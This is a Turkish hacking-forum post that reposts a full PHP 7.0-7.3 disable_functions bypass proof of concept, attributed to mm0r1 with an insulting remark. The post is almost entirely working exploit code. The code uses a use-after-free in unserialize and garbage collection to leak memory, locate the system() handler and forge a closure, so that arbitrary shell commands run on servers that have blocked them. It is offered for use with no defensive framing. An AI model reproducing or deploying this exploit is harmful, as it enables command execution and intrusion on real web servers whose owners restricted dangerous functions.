• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

PHP 7 disable_functions Bypass Exploit

Katılım
Eki 26, 2019
Mesajlar
23
Tepkime puanı
15
Puanları
3
Konum
Texas
Web sitesi
atakbeysecurity.xyz
Exploit Yazar:mm0r1(ibne)
Local: Evet
Remote: Hayır
Exploit Tarih:2019.10.04
Exploit'in Tehlikesi:High
PHP:
<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
# released as of 04/10/2019, specifically:
#
# PHP 7.0 - 7.0.33
# PHP 7.1 - 7.1.31
# PHP 7.2 - 7.2.23
# PHP 7.3 - 7.3.10
#
# Author: https://github.com/mm0r1

pwn("uname -a");

function pwn($cmd) {
  global $abc, $helper;

  function str2ptr(&$str, $p = 0, $s = 8) {
    $address = 0;
    for($j = $s-1; $j >= 0; $j--) {
      $address <<= 8;
      $address |= ord($str[$p+$j]);
    }
    return $address;
  }

  function ptr2str($ptr, $m = 8) {
    $out = "";
    for ($i=0; $i < $m; $i++) {
      $out .= chr($ptr & 0xff);
      $ptr >>= 8;
    }
    return $out;
  }

  function write(&$str, $p, $v, $n = 8) {
    $i = 0;
    for($i = 0; $i < $n; $i++) {
      $str[$p + $i] = chr($v & 0xff);
      $v >>= 8;
    }
  }

  function leak($addr, $p = 0, $s = 8) {
    global $abc, $helper;
    write($abc, 0x68, $addr + $p - 0x10);
    $leak = strlen($helper->a);
    if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
    return $leak;
  }

  function parse_elf($base) {
    $e_type = leak($base, 0x10, 2);

    $e_phoff = leak($base, 0x20);
    $e_phentsize = leak($base, 0x36, 2);
    $e_phnum = leak($base, 0x38, 2);

    for($i = 0; $i < $e_phnum; $i++) {
      $header = $base + $e_phoff + $i * $e_phentsize;
      $p_type = leak($header, 0, 4);
      $p_flags = leak($header, 4, 4);
      $p_vaddr = leak($header, 0x10);
      $p_memsz = leak($header, 0x28);

      if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
        # handle pie
        $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
        $data_size = $p_memsz;
      } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
        $text_size = $p_memsz;
      }
    }

    if(!$data_addr || !$text_size || !$data_size)
      return false;

    return [$data_addr, $text_size, $data_size];
  }

  function get_basic_funcs($base, $elf) {
    list($data_addr, $text_size, $data_size) = $elf;
    for($i = 0; $i < $data_size / 8; $i++) {
      $leak = leak($data_addr, $i * 8);
      if($leak - $base > 0 && $leak - $base < $text_size) {
        $deref = leak($leak);
        # 'constant' constant check
        if($deref != 0x746e6174736e6f63)
          continue;
      } else continue;

      $leak = leak($data_addr, ($i + 4) * 8);
      if($leak - $base > 0 && $leak - $base < $text_size) {
        $deref = leak($leak);
        # 'bin2hex' constant check
        if($deref != 0x786568326e6962)
          continue;
      } else continue;

      return $data_addr + $i * 8;
    }
  }

  function get_binary_base($binary_leak) {
    $base = 0;
    $start = $binary_leak & 0xfffffffffffff000;
    for($i = 0; $i < 0x1000; $i++) {
      $addr = $start - 0x1000 * $i;
      $leak = leak($addr, 0, 7);
      if($leak == 0x10102464c457f) { # ELF header
        return $addr;
      }
    }
  }

  function get_system($basic_funcs) {
    $addr = $basic_funcs;
    do {
      $f_entry = leak($addr);
      $f_name = leak($f_entry, 0, 6);

      if($f_name == 0x6d6574737973) { # system
        return leak($addr + 8);
      }
      $addr += 0x20;
    } while($f_entry != 0);
    return false;
  }

  class ryat {
    var $ryat;
    var $chtg;
    
    function __destruct()
    {
      $this->chtg = $this->ryat;
      $this->ryat = 1;
    }
  }

  class Helper {
    public $a, $b, $c, $d;
  }

  if(stristr(PHP_OS, 'WIN')) {
    die('This PoC is for *nix systems only.');
  }

  $n_alloc = 10; # increase this value if you get segfaults

  $contiguous = [];
  for($i = 0; $i < $n_alloc; $i++)
    $contiguous[] = str_repeat('A', 79);

  $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
  $out = unserialize($poc);
  gc_collect_cycles();

  $v = [];
  $v[0] = ptr2str(0, 79);
  unset($v);
  $abc = $out[2][0];

  $helper = new Helper;
  $helper->b = function ($x) { };

  if(strlen($abc) == 79) {
    die("UAF failed");
  }

  # leaks
  $closure_handlers = str2ptr($abc, 0);
  $php_heap = str2ptr($abc, 0x58);
  $abc_addr = $php_heap - 0xc8;

  # fake value
  write($abc, 0x60, 2);
  write($abc, 0x70, 6);

  # fake reference
  write($abc, 0x10, $abc_addr + 0x60);
  write($abc, 0x18, 0xa);

  $closure_obj = str2ptr($abc, 0x20);

  $binary_leak = leak($closure_handlers, 8);
  if(!($base = get_binary_base($binary_leak))) {
    die("Couldn't determine binary base address");
  }

  if(!($elf = parse_elf($base))) {
    die("Couldn't parse ELF header");
  }

  if(!($basic_funcs = get_basic_funcs($base, $elf))) {
    die("Couldn't get basic_functions address");
  }

  if(!($zif_system = get_system($basic_funcs))) {
    die("Couldn't get zif_system address");
  }

  # fake closure object
  $fake_obj_offset = 0xd0;
  for($i = 0; $i < 0x110; $i += 8) {
    write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
  }

  # pwn
  write($abc, 0x20, $abc_addr + $fake_obj_offset);
  write($abc, 0xd0 + 0x38, 1, 4); # internal func type
  write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

  ($helper->b)($cmd);

  exit();
}
 
shape1
shape2
shape3
shape4
shape7
shape8
Üst